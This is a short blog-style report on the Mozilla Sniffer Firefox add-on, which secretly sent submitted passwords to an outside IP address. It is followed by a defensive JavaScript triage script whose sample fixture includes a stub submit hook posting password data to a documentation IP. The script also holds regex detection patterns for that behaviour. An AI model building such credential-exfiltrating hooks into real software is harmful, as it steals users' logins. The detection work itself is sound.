
Firefox security test add-on contains backdoor

Kinda ironic that a security add-on for Firefox contained a backdoor that leaked confidential information to an unknown third party.

However, using the Mozilla Sniffer add-on would have introduced an unexpected vulnerability in any application being tested — whenever a login form was submitted, the add-on secretly sent a copy of the URL, password and other details to an IP address presumably controlled by the malicious author.

The backdoor was uncovered by Mozilla user Johann-Peter Hartmann of SektionEins who was using the add-on to test the security of a friend's online game.

This was a pretty serious issue. The Mozilla Sniffer add-on overwrote some of the original Tamper Data files and added a new script that injected a new function, which was called whenever a form was submitted by the browser. The function looked for any forms that had non-empty password fields and then used two other functions to send the data to the third party, presumably a fraudster.

Oooops.
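For anyone vetting a repackaged add-on, here is an added example (not code from Mozilla, Tamper Data or SektionEins) that compares a candidate add-on's scripts with the add-on it claims to be based on and checks the changed files for the three behaviours described above. The file names, sample sources, regexes and the 192.0.2.10 documentation address are all constructed assumptions.

```javascript
// Heuristic signals for the behaviour the article describes (assumed patterns).
const SIGNALS = {
  submitHook: /addEventListener\(\s*['"]submit['"]/,     // runs on every form submit
  passwordField: /type\s*={2,3}\s*['"]password['"]/,     // inspects password inputs
  hardcodedIp: /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}/,     // sends to a literal IP address
};

// baseline and candidate map file path -> script source text.
function triageAddon(baseline, candidate) {
  const changed = [];
  const combined = new Set();
  for (const [path, source] of Object.entries(candidate)) {
    let status = "unchanged";
    if (!(path in baseline)) status = "added";
    else if (baseline[path] !== source) status = "modified";
    if (status === "unchanged") continue;
    const hits = Object.keys(SIGNALS).filter((name) => SIGNALS[name].test(source));
    hits.forEach((name) => combined.add(name));
    changed.push({ path, status, hits });
  }
  // The hook and the sender can live in different files, so the verdict is
  // taken over all changed files together rather than file by file.
  const suspicious = Object.keys(SIGNALS).every((name) => combined.has(name));
  return { changed, suspicious };
}

// Constructed sample: one original file modified, one new script added.
const SAMPLE_BASELINE = {
  "content/original.js": "function start() { /* original logic */ }",
  "content/common.js": "function log(msg) { dump(msg); }",
};
const SAMPLE_CANDIDATE = {
  "content/original.js":
    "function start() { /* original logic */ }\n" +
    "window.addEventListener('submit', onFormSubmit, true);",
  "content/common.js": "function log(msg) { dump(msg); }",
  "content/added-script.js":
    "function onFormSubmit(ev) { /* ... */ if (field.type == 'password') report(ev); }\n" +
    "function report(ev) { /* ... */ req.open('POST', 'http://192.0.2.10/collect'); }",
};

const result = triageAddon(SAMPLE_BASELINE, SAMPLE_CANDIDATE);
for (const f of result.changed) console.log(f.status, f.path, f.hits.join(","));
console.log("needs manual review:", result.suspicious);
```

A hit is only a prompt for manual review of the changed files; obfuscated or differently written code will not match these patterns.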
